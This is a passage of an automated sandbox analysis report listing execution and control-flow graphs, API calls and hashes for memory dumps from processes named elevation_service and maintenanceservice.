601->584 602->600 604->595
                                                                                                                                                          APIs
                                                                                                                                                          • CloseHandle.KERNELBASE ref: 0099830B
                                                                                                                                                          • GetTokenInformation.KERNELBASE ref: 00998369
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000A.00000002.2859021861.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandleInformationToken
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3954737543-0
                                                                                                                                                          • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                          • Instruction ID: 550dec73259b7a6fbc7719f914cfce04594bfe56695529192cea12fb748e64cc
                                                                                                                                                          • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                          • Instruction Fuzzy Hash: AAF0FA3151CA418B9EB58B0CC4A193BA7ACAF23780B3C48ACC447CB422CF2CDC42E752

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:4.7%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:62
                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                          execution_graph 3700 cd5b8f 3711 ce53f0 3700->3711 3702 cd5baf 3716 cd81c0 3702->3716 3704 cd5c2c 3705 cd5c84 3722 cd5990 3705->3722 3706 cd5bbc 3706->3704 3706->3705 3709 cd5d56 CreateThread 3706->3709 3710 cd5cd4 CreateThread CloseHandle 3706->3710 3708 cd5dcd 3708->3708 3709->3706 3710->3706 3712 ce53f4 3711->3712 3713 ce545e VirtualAlloc 3712->3713 3715 ce53f6 3712->3715 3714 ce5460 3713->3714 3714->3712 3715->3702 3719 cd81e5 3716->3719 3717 cd830b CloseHandle 3717->3719 3718 cd8357 GetTokenInformation 3718->3719 3719->3717 3719->3718 3720 cd8212 GetTokenInformation 3719->3720 3721 cd8220 3719->3721 3720->3719 3720->3721 3721->3706 3724 cd5994 wcscpy 3722->3724 3723 cd5a23 3723->3708 3724->3723 3725 cd5a8d VirtualAlloc 3724->3725 3725->3724 3732 cd58de 3733 ce53f0 VirtualAlloc 3732->3733 3734 cd58f9 3733->3734 3735 cd81c0 3 API calls 3734->3735 3736 cd5907 3735->3736 3726 cd83e7 3729 cd81e5 3726->3729 3727 cd830b CloseHandle 3727->3729 3728 cd8212 GetTokenInformation 3728->3729 3731 cd8220 3728->3731 3729->3727 3729->3728 3730 cd8357 GetTokenInformation 3729->3730 3729->3731 3730->3729 3775 cd8201 3777 cd81e5 3775->3777 3779 cd8220 3775->3779 3776 cd830b CloseHandle 3776->3777 3777->3776 3778 cd8357 GetTokenInformation 3777->3778 3777->3779 3780 cd8212 GetTokenInformation 3777->3780 3778->3777 3780->3777 3780->3779 3755 cd5d50 CreateThread 3757 cd5bbc 3755->3757 3756 cd5cd4 CreateThread CloseHandle 3756->3757 3757->3756 3758 cd5c84 3757->3758 3759 cd5c2c 3757->3759 3761 cd5d56 CreateThread 3757->3761 3760 cd5990 VirtualAlloc 3758->3760 3762 cd5dcd 3760->3762 3761->3757 3762->3762 3737 cd81e3 3740 cd81e5 3737->3740 3738 cd8357 GetTokenInformation 3738->3740 3739 cd830b CloseHandle 3739->3740 3740->3738 3740->3739 3741 cd8212 GetTokenInformation 3740->3741 3742 cd8220 3740->3742 3741->3740 3741->3742 3787 cd5d22 3788 cd5cd4 CreateThread CloseHandle 3787->3788 3791 cd5bbc 3787->3791 3788->3791 3789 cd5c2c 3790 cd5d56 CreateThread 3790->3791 3791->3788 3791->3789 3791->3790 3792 cd5c84 3791->3792 3793 cd5990 VirtualAlloc 3792->3793 3794 cd5dcd 3793->3794 3794->3794

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 0 cd81c0-cd81d8 1 cd83bf-cd83ca 0->1 3 cd8277-cd827a 1->3 4 cd83d0 1->4 5 cd827c 3->5 6 cd8241 3->6 4->3 7 cd83d6 4->7 5->6 8 cd827e 5->8 10 cd8376-cd837b 6->10 11 cd8251-cd8256 call d072f4 6->11 9 cd83d7-cd83dd 7->9 13 cd830b-cd8311 CloseHandle 8->13 14 cd8284 8->14 15 cd8381 10->15 16 cd82f0-cd831c 10->16 17 cd825b-cd8260 11->17 18 cd832e-cd8330 13->18 14->18 15->16 21 cd8387 15->21 33 cd81e5 16->33 34 cd8322 16->34 22 cd8390-cd8393 17->22 23 cd82dd-cd82e3 18->23 24 cd8332 18->24 21->3 21->22 22->8 28 cd8399 22->28 25 cd82e9 23->25 26 cd83a3-cd83a4 23->26 24->23 27 cd8334 24->27 25->26 30 cd82ef 25->30 31 cdf524-cdf52e 27->31 28->8 32 cd839f-cd83a1 28->32 30->16 38 cdf807 31->38 32->26 35 cd81eb 33->35 36 cd82a3-cd82a5 33->36 34->33 37 cd8328-cd832c 34->37 43 cd81f1 35->43 44 cd82b2-cd836f GetTokenInformation 35->44 41 cd83f9 36->41 42 cd82ab 36->42 37->18 45 cd82c5-cd82c8 37->45 39 cdf80d 38->39 40 cdf8df-cdf8e0 38->40 39->40 46 cdf813 39->46 55 ce15a5-ce15aa 40->55 47 cd83ff 41->47 48 cd82d2-cd82d7 41->48 42->41 49 cd82b1 42->49 43->44 50 cd81f7 43->50 44->10 45->41 52 cd82ce 45->52 61 cdf78f 46->61 62 cdf81b 46->62 47->31 53 cd8306-cd8309 48->53 49->44 56 cd828e 50->56 57 cd828f-cd8303 call d072ec 52->57 58 cd82d0 52->58 53->13 53->18 60 ce15ae-ce15af 55->60 56->57 57->53 68 cd834f-cd8355 57->68 58->48 58->57 64 ce15b2-ce15b7 60->64 61->62 65 cdf795 61->65 62->40 67 ce15ba-ce15c1 64->67 65->38 69 ce15c7-ce15d2 67->69 70 ce1750-ce17a2 call d072f4 67->70 80 cd8341 68->80 81 cd8212-cd821a GetTokenInformation 68->81 71 ce15d4-ce15d6 69->71 72 ce1620-ce1623 69->72 76 ce15dc-ce15df 71->76 77 ce1670-ce1684 71->77 78 ce1625-ce1628 72->78 79 ce16a0-ce16b4 72->79 76->67 82 ce15e1-ce15f6 76->82 77->55 84 ce168a-ce168d 77->84 78->67 83 ce162a-ce1636 78->83 88 ce16b6-ce16b9 79->88 89 ce16f4-ce16f5 79->89 80->81 87 cd8347 80->87 85 cd83af 81->85 86 cd8220-cd8234 81->86 92 ce15fc-ce1600 82->92 93 ce16d2-ce16d7 82->93 94 ce16dc-ce16ec 83->94 95 ce1638-ce1640 83->95 97 ce172f-ce1738 84->97 98 ce1693-ce1697 84->98 85->11 96 cd83b5 85->96 86->9 113 cd823a 86->113 87->95 100 cd834d 87->100 90 ce173a-ce173b 88->90 91 ce16bb 88->91 102 ce16fe-ce170c 89->102 108 ce173f-ce1740 90->108 101 ce16bf-ce16cd 91->101 92->102 103 ce1606-ce1618 92->103 93->60 94->69 104 ce16f2 94->104 105 ce170e-ce1727 95->105 106 ce1646-ce165f 95->106 96->11 107 cd83bb-cd83bd 96->107 97->108 98->101 100->68 110 ce1744-ce1748 102->110 103->64 104->70 105->69 111 ce172d 105->111 106->69 112 ce1665 106->112 107->1 108->110 111->70 112->70 113->9 114 cd8240 113->114 115 ceb32e-ceb330 114->115 116 ceb332-ceb337 call d072f4 115->116 117 ceb300 115->117 116->117 125 ceb339 116->125 120 ceb2fd 117->120 121 ceb302 117->121 123 ceb2ff 120->123 124 ceb305 120->124 126 ceb308-ceb315 123->126 124->126 127 ceb322-ceb32d 124->127 125->117 128 ceb33b-ceb33f 125->128 126->124 130 ceb317 126->130 127->115 128->126 130->120
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.1643826916.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1cefe6a1d073a468b2f47e60a6f5afefe70bf264b610db135861494dc24b89b7
                                                                                                                                                          • Instruction ID: daa98a7dc80c36e411a4fcb4ed45e8cd3aec545346ac005bed2058c8a110effd
                                                                                                                                                          • Opcode Fuzzy Hash: 1cefe6a1d073a468b2f47e60a6f5afefe70bf264b610db135861494dc24b89b7
                                                                                                                                                          • Instruction Fuzzy Hash: 8CB13B3050DE858BCB29CB1F8481275B7A1FF95310F28825FD9AB87366DE349E06C352

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 131 cd5b8f-cd5c20 call ce53f0 call d08358 call cf0320 call cd81c0 141 cd5cf4-cd5d08 call d072ec 131->141 142 cd5c26 131->142 146 cd5d0e 141->146 147 cd5c87-cd5dc8 call cd5e60 call cd5990 141->147 142->141 143 cd5c2c-cd5c2f 142->143 146->147 148 cd5d14-cd5d18 146->148 162 cd5dcd 147->162 152 cd5daf-cd5db6 call cd52d0 148->152 153 cd5c65 148->153 164 cd5dbc 152->164 165 cd5c30-cd5c39 152->165 155 cd5c67 153->155 156 cd5ca3 call cd5df0 153->156 155->156 160 cd5c69-cd5c9d 155->160 167 cd5c45-cd5d6d call cf1520 156->167 176 cd5c9f 160->176 177 cd5c85 160->177 162->162 168 cd5d7d-cd5d89 164->168 169 cd5dbe 164->169 179 cd5cb9-cd5cbd 165->179 180 cd5bf7 165->180 186 cd5bfd-cd5c06 167->186 193 cd5d73 167->193 181 cd5d8b-cd5d92 168->181 182 cd5d94 168->182 169->168 183 cd5d9b 169->183 176->177 184 cd5ca1 176->184 177->147 187 cd5d56-cd5d5b CreateThread 179->187 188 cd5cc3 179->188 180->179 180->186 181->182 189 cd5d9c 181->189 182->143 191 cd5cb3 182->191 183->189 184->156 195 cd5da5-cd5da8 186->195 197 cd5d1f-cd5d45 187->197 198 cd5c7e 187->198 188->187 194 cd5cc9 188->194 189->195 191->143 191->179 193->186 199 cd5d79-cd5d7b 193->199 194->187 195->152 202 cd5cd4-cd5cea CreateThread CloseHandle 197->202 203 cd5d47 197->203 198->197 200 cd5c84 198->200 199->168 200->177 202->181 205 cd5cf0-cd5d4d 202->205 203->202 205->182
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.1643826916.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                          • Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                          • Instruction ID: d1add51b21096879461e227eb5b3256e09b6074fca4731c47afe59b3eac915f8
                                                                                                                                                          • Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                          • Instruction Fuzzy Hash: 4E413A20628F098FDB68A739855873976D2FBDD310F5801ABD327CB3A1DF258E049762

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 207 cd5d22-cd5d45 208 cd5cd4-cd5cea CreateThread CloseHandle 207->208 209 cd5d47 207->209 211 cd5d8b-cd5d92 208->211 212 cd5cf0-cd5d4d 208->212 209->208 214 cd5d9c 211->214 215 cd5d94 211->215 212->215 217 cd5da5-cd5db6 call cd52d0 214->217 218 cd5c2c-cd5c2f 215->218 219 cd5cb3 215->219 230 cd5dbc 217->230 231 cd5c30-cd5c39 217->231 219->218 220 cd5cb9-cd5cbd 219->220 222 cd5d56-cd5d5b CreateThread 220->222 223 cd5cc3 220->223 228 cd5d1f-cd5d45 222->228 229 cd5c7e 222->229 223->222 226 cd5cc9 223->226 226->222 228->208 228->209 229->228 232 cd5c84-cd5dc8 call cd5e60 call cd5990 229->232 234 cd5d7d-cd5d89 230->234 235 cd5dbe 230->235 231->220 241 cd5bf7 231->241 250 cd5dcd 232->250 234->211 234->215 235->234 243 cd5d9b 235->243 241->220 244 cd5bfd-cd5c06 241->244 243->214 244->217 250->250
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.1643826916.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                          • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                          • Instruction ID: cf1f3a0d975e35ed82f36dc42ce9ff05e343ed18d2bc21fdde4880d6e604ba50
                                                                                                                                                          • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                          • Instruction Fuzzy Hash: 4DF0F02063CE0585DB2C923A895933A66C3E7DE321F640B1FC377C93E4DA248B019669

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 251 cd5d50-cd5d5b CreateThread 252 cd5c78 251->252 253 cd5d1f-cd5d45 252->253 254 cd5c7e 252->254 257 cd5cd4-cd5cea CreateThread CloseHandle 253->257 258 cd5d47 253->258 254->253 255 cd5c84-cd5dc8 call cd5e60 call cd5990 254->255 279 cd5dcd 255->279 261 cd5d8b-cd5d92 257->261 262 cd5cf0-cd5d4d 257->262 258->257 265 cd5d9c 261->265 266 cd5d94 261->266 262->266 270 cd5da5-cd5db6 call cd52d0 265->270 271 cd5c2c-cd5c2f 266->271 272 cd5cb3 266->272 283 cd5dbc 270->283 284 cd5c30-cd5c39 270->284 272->271 274 cd5cb9-cd5cbd 272->274 277 cd5d56-cd5d5b CreateThread 274->277 278 cd5cc3 274->278 277->252 278->277 281 cd5cc9 278->281 279->279 281->277 285 cd5d7d-cd5d89 283->285 286 cd5dbe 283->286 284->274 291 cd5bf7 284->291 285->261 285->266 286->285 292 cd5d9b 286->292 291->274 293 cd5bfd-cd5c06 291->293 292->265 293->270
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.1643826916.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                          • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                          • Instruction ID: a3afd48a5e18414d57460958b7cb73c9023d891fc22d67f8d7251b2ff6d398f1
                                                                                                                                                          • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                          • Instruction Fuzzy Hash: C4B01200039F8659012523310A0852809826F8A3349781FAFCFB306BE2DA000D046730

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 295 cd5990-cd599b 297 cd59a1 295->297 298 cd5a33-cd5a61 call d09b00 295->298 297->298 300 cd59a7-cd59ab 297->300 308 cd5ab4-cd5aba call cf1080 298->308 309 cd5a63 298->309 304 cd5a59 300->304 305 cd59b1-cd59f3 call d02320 300->305 306 cd5a5b 304->306 307 cd5a25-cd5a2d 304->307 305->304 322 cd59f5-cd59fa 305->322 306->307 321 cd5a23 306->321 311 cd5a2f 307->311 312 cd5a70-cd5a7b 307->312 327 cd5a83-cd5a88 call cd5df0 308->327 330 cd5a13 308->330 309->308 315 cd5a65 309->315 311->315 319 cd5a7d 312->319 320 cd5a16-cd5a1e call cf1470 312->320 315->312 319->320 325 cd5a7f-cd5a81 319->325 336 cd5a96-cd5ac2 320->336 326 cd5a24 321->326 328 cd59fc 322->328 329 cd5a51-cd5a54 call d0233c 322->329 325->327 337 cd5a8d VirtualAlloc 327->337 328->329 333 cd59fe-cd5a02 328->333 329->304 330->327 335 cd5a15 330->335 333->329 335->320 336->326 339 cd5ac8 336->339 337->336 339->326 340 cd5ace 339->340 340->298
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.1643826916.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: wcscpy
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1284135714-0
                                                                                                                                                          • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                          • Instruction ID: cd640ac7043d2108948d0ce32335c5d0a50fe0c1fa4ffaa677473442f51b8341
                                                                                                                                                          • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                          • Instruction Fuzzy Hash: F121F82051DEB48FD76A931944E53B626A2F795324F5803CBD3AECB3D2D9284F05B253

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 342 cd8245-cd8247 343 cd824d-cd824f 342->343 344 cd82d2-cd82d7 342->344 346 cd8251-cd8260 call d072f4 343->346 345 cd8306-cd8309 344->345 348 cd832e-cd8330 345->348 349 cd830b-cd8311 CloseHandle 345->349 355 cd8390-cd8393 346->355 351 cd82dd-cd82e3 348->351 352 cd8332 348->352 349->348 353 cd82e9 351->353 354 cd83a3-cd83a4 351->354 352->351 356 cd8334 352->356 353->354 357 cd82ef 353->357 359 cd827e 355->359 360 cd8399 355->360 358 cdf524-cdf52e 356->358 366 cd82f0-cd831c 357->366 363 cdf807 358->363 359->349 361 cd8284 359->361 360->359 362 cd839f-cd83a1 360->362 361->348 362->354 364 cdf80d 363->364 365 cdf8df-cdf8e0 363->365 364->365 367 cdf813 364->367 370 ce15a5-ce15aa 365->370 375 cd81e5 366->375 376 cd8322 366->376 373 cdf78f 367->373 374 cdf81b 367->374 372 ce15ae-ce15af 370->372 377 ce15b2-ce15b7 372->377 373->374 378 cdf795 373->378 374->365 379 cd81eb 375->379 380 cd82a3-cd82a5 375->380 376->375 381 cd8328-cd832c 376->381 382 ce15ba-ce15c1 377->382 378->363 385 cd81f1 379->385 386 cd82b2-cd836f GetTokenInformation 379->386 383 cd83f9 380->383 384 cd82ab 380->384 381->348 387 cd82c5-cd82c8 381->387 388 ce15c7-ce15d2 382->388 389 ce1750-ce17a2 call d072f4 382->389 383->344 392 cd83ff 383->392 384->383 393 cd82b1 384->393 385->386 394 cd81f7-cd828e 385->394 407 cd8376-cd837b 386->407 387->383 396 cd82ce 387->396 390 ce15d4-ce15d6 388->390 391 ce1620-ce1623 388->391 399 ce15dc-ce15df 390->399 400 ce1670-ce1684 390->400 401 ce1625-ce1628 391->401 402 ce16a0-ce16b4 391->402 392->358 393->386 404 cd828f-cd8303 call d072ec 394->404 396->404 405 cd82d0 396->405 399->382 406 ce15e1-ce15f6 399->406 400->370 410 ce168a-ce168d 400->410 401->382 409 ce162a-ce1636 401->409 411 ce16b6-ce16b9 402->411 412 ce16f4-ce16f5 402->412 404->345 432 cd834f-cd8355 404->432 405->344 405->404 415 ce15fc-ce1600 406->415 416 ce16d2-ce16d7 406->416 407->366 417 cd8381 407->417 419 ce16dc-ce16ec 409->419 420 ce1638-ce1640 409->420 421 ce172f-ce1738 410->421 422 ce1693-ce1697 410->422 413 ce173a-ce173b 411->413 414 ce16bb 411->414 424 ce16fe-ce170c 412->424 431 ce173f-ce1740 413->431 423 ce16bf-ce16cd 414->423 415->424 425 ce1606-ce1618 415->425 416->372 417->366 427 cd8387 417->427 419->388 426 ce16f2 419->426 429 ce170e-ce1727 420->429 430 ce1646-ce165f 420->430 421->431 422->423 434 ce1744-ce1748 424->434 425->377 426->389 427->355 433 cd8277-cd827a 427->433 429->388 435 ce172d 429->435 430->388 436 ce1665 430->436 431->434 440 cd8341 432->440 441 cd8212-cd821a GetTokenInformation 432->441 437 cd827c 433->437 438 cd8241 433->438 435->389 436->389 437->359 437->438 438->346 438->407 440->441 444 cd8347 440->444 442 cd83af 441->442 443 cd8220-cd8234 441->443 442->346 445 cd83b5 442->445 451 cd823a 443->451 452 cd83d7-cd83dd 443->452 444->420 447 cd834d 444->447 445->346 448 cd83bb-cd83ca 445->448 447->432 448->433 457 cd83d0 448->457 451->452 453 cd8240 451->453 456 ceb32e-ceb330 453->456 459 ceb332-ceb337 call d072f4 456->459 460 ceb300 456->460 457->433 458 cd83d6 457->458 458->452 459->460 468 ceb339 459->468 463 ceb2fd 460->463 464 ceb302 460->464 466 ceb2ff 463->466 467 ceb305 463->467 469 ceb308-ceb315 466->469 467->469 470 ceb322-ceb32d 467->470 468->460 471 ceb33b-ceb33f 468->471 469->467 473 ceb317 469->473 470->456 471->469 473->463
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.1643826916.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                          • Opcode ID: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                          • Instruction ID: bca5e1aed5273afefe0aebe8c82be0a59753f4a0a46234f166323bb2215c3560
                                                                                                                                                          • Opcode Fuzzy Hash: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                          • Instruction Fuzzy Hash: 5FF0F43450DA818FCA269719985053A7BA0BF42710B59009FD65BCB7A2CE149E0BE3A3

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 605 cd83e7-cd83e9 606 cd83ef 605->606 607 cd82c5-cd82c8 605->607 606->607 608 cd83f5-cd83f7 606->608 609 cd82ce 607->609 610 cd83f9 607->610 608->610 613 cd828f-cd8303 call d072ec 609->613 614 cd82d0 609->614 611 cd83ff 610->611 612 cd82d2-cd82d7 610->612 617 cdf524-cdf52e 611->617 615 cd8306-cd8309 612->615 613->615 630 cd834f-cd8355 613->630 614->612 614->613 618 cd832e-cd8330 615->618 619 cd830b-cd8311 CloseHandle 615->619 621 cdf807 617->621 624 cd82dd-cd82e3 618->624 625 cd8332 618->625 619->618 622 cdf80d 621->622 623 cdf8df-cdf8e0 621->623 622->623 629 cdf813 622->629 635 ce15a5-ce15aa 623->635 627 cd82e9 624->627 628 cd83a3-cd83a4 624->628 625->624 631 cd8334 625->631 627->628 632 cd82ef 627->632 639 cdf78f 629->639 640 cdf81b 629->640 637 cd8341 630->637 638 cd8212-cd821a GetTokenInformation 630->638 631->617 641 cd82f0-cd831c 632->641 636 ce15ae-ce15af 635->636 644 ce15b2-ce15b7 636->644 637->638 645 cd8347 637->645 642 cd83af 638->642 643 cd8220-cd8234 638->643 639->640 646 cdf795 639->646 640->623 677 cd81e5 641->677 678 cd8322 641->678 648 cd83b5 642->648 649 cd8251-cd8256 call d072f4 642->649 673 cd823a 643->673 674 cd83d7-cd83dd 643->674 650 ce15ba-ce15c1 644->650 652 cd834d 645->652 653 ce1638-ce1640 645->653 646->621 648->649 657 cd83bb-cd83ca 648->657 662 cd825b-cd8260 649->662 658 ce15c7-ce15d2 650->658 659 ce1750-ce17a2 call d072f4 650->659 652->630 655 ce170e-ce1727 653->655 656 ce1646-ce165f 653->656 655->658 665 ce172d 655->665 656->658 666 ce1665 656->666 700 cd8277-cd827a 657->700 701 cd83d0 657->701 660 ce15d4-ce15d6 658->660 661 ce1620-ce1623 658->661 670 ce15dc-ce15df 660->670 671 ce1670-ce1684 660->671 675 ce1625-ce1628 661->675 676 ce16a0-ce16b4 661->676 672 cd8390-cd8393 662->672 665->659 666->659 670->650 679 ce15e1-ce15f6 670->679 671->635 687 ce168a-ce168d 671->687 684 cd827e 672->684 685 cd8399 672->685 673->674 680 cd8240 673->680 675->650 681 ce162a-ce1636 675->681 689 ce16b6-ce16b9 676->689 690 ce16f4-ce16f5 676->690 682 cd81eb 677->682 683 cd82a3-cd82a5 677->683 678->677 686 cd8328-cd832c 678->686 692 ce15fc-ce1600 679->692 693 ce16d2-ce16d7 679->693 694 ceb32e-ceb330 680->694 681->653 695 ce16dc-ce16ec 681->695 705 cd81f1 682->705 706 cd82b2-cd836f GetTokenInformation 682->706 683->610 696 cd82ab 683->696 684->619 691 cd8284 684->691 685->684 697 cd839f-cd83a1 685->697 686->607 686->618 698 ce172f-ce1738 687->698 699 ce1693-ce1697 687->699 702 ce173a-ce173b 689->702 703 ce16bb 689->703 709 ce16fe-ce170c 690->709 691->618 692->709 710 ce1606-ce1618 692->710 693->636 712 ceb332-ceb337 call d072f4 694->712 713 ceb300 694->713 695->658 717 ce16f2 695->717 696->610 711 cd82b1 696->711 697->628 719 ce173f-ce1740 698->719 715 ce16bf-ce16cd 699->715 707 cd827c 700->707 708 cd8241 700->708 701->700 716 cd83d6 701->716 702->719 703->715 705->706 718 cd81f7 705->718 724 cd8376-cd837b 706->724 707->684 707->708 708->649 708->724 722 ce1744-ce1748 709->722 710->644 711->706 712->713 732 ceb339 712->732 725 ceb2fd 713->725 726 ceb302 713->726 716->674 717->659 723 cd828e 718->723 719->722 723->613 724->641 727 cd8381 724->727 729 ceb2ff 725->729 730 ceb305 725->730 727->641 731 cd8387 727->731 733 ceb308-ceb315 729->733 730->733 734 ceb322-ceb32d 730->734 731->672 731->700 732->713 735 ceb33b-ceb33f 732->735 733->730 737 ceb317 733->737 734->694 735->733 737->725
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.1643826916.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                          • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                          • Instruction ID: 83fa036e12aeb7093ab2520390247ce9592bba321f3dba3af4f63a36baae508a
                                                                                                                                                          • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                          • Instruction Fuzzy Hash: 6FF0903450C9418B86358609D88063A77A0BB62700B6C005FC76BCB762DE24DF0BE793

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
